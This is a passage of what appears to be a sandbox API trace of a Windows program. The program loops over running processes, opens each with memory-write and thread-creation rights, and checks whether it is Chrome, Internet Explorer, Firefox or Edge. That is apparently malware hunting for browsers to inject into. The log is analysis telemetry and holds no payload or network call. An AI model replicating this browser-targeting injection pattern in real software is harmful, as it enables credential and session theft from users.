	[0231.968] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.968] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.969] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x6c74
	[0231.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.969] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.969] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.970] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.970] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.970] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.971] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.972] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x6c78
	[0231.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.972] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.972] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.973] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.973] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.973] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.974] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x6c7c
	[0231.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.974] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.974] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.975] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.975] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.975] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0231.976] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x6c80
	[0231.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.976] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0231.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.976] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.977] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0231.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.977] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.977] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0231.978] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x6c84
	[0231.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.978] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.979] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.979] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.979] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.979] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.980] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x6c88
	[0231.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.980] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.981] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.981] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.981] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.981] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.982] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x6c8c
	[0231.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.982] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.983] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.983] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.983] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.984] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0231.984] CloseHandle (hObject=0x4fd0) returned 1
	[0231.984] Sleep (dwMilliseconds=0x64) 
	[0232.083] GetCurrentProcessId () returned 0x110
	[0232.083] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0232.087] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0232.089] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0232.090] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0232.091] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x6c90
	[0232.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.091] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0232.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.091] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.092] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0232.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.092] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.092] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0232.093] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x6c94
	[0232.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.093] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0232.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.094] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.094] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0232.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.095] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.095] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0232.096] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x6c98
	[0232.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.096] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0232.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.096] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.097] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0232.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.097] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.098] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0232.099] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x6c9c
	[0232.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.099] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0232.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.099] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.100] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0232.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.100] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.100] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0232.101] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x6ca0
	[0232.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.101] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0232.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.102] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.102] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0232.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.102] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.102] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0232.103] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x6ca4
	[0232.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.103] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0232.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.104] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.104] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0232.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.104] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.105] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0232.105] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x6ca8
	[0232.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.105] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0232.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.106] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.106] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0232.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.106] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.106] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0232.107] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x6cac
	[0232.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.107] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0232.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.108] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.108] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0232.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.108] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.108] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.109] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x6cb0
	[0232.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.109] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.109] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.110] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.110] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.110] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.111] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x6cb4
	[0232.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.111] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.112] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.112] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.112] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.160] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.161] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x6cb8
	[0232.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.161] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.162] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.162] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.162] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.162] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.163] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x6cbc
	[0232.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.163] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.164] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.164] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.164] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.164] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.165] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x6cc0
	[0232.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.165] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.166] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.166] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.166] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.166] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.167] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x6cc4
	[0232.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.167] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.168] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.168] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.168] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.169] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.169] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x6cc8
	[0232.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.169] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.170] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.170] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.170] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.171] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0232.171] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x6ccc
	[0232.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.171] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0232.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.172] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.172] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0232.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.172] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.173] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.173] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x6cd0
	[0232.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
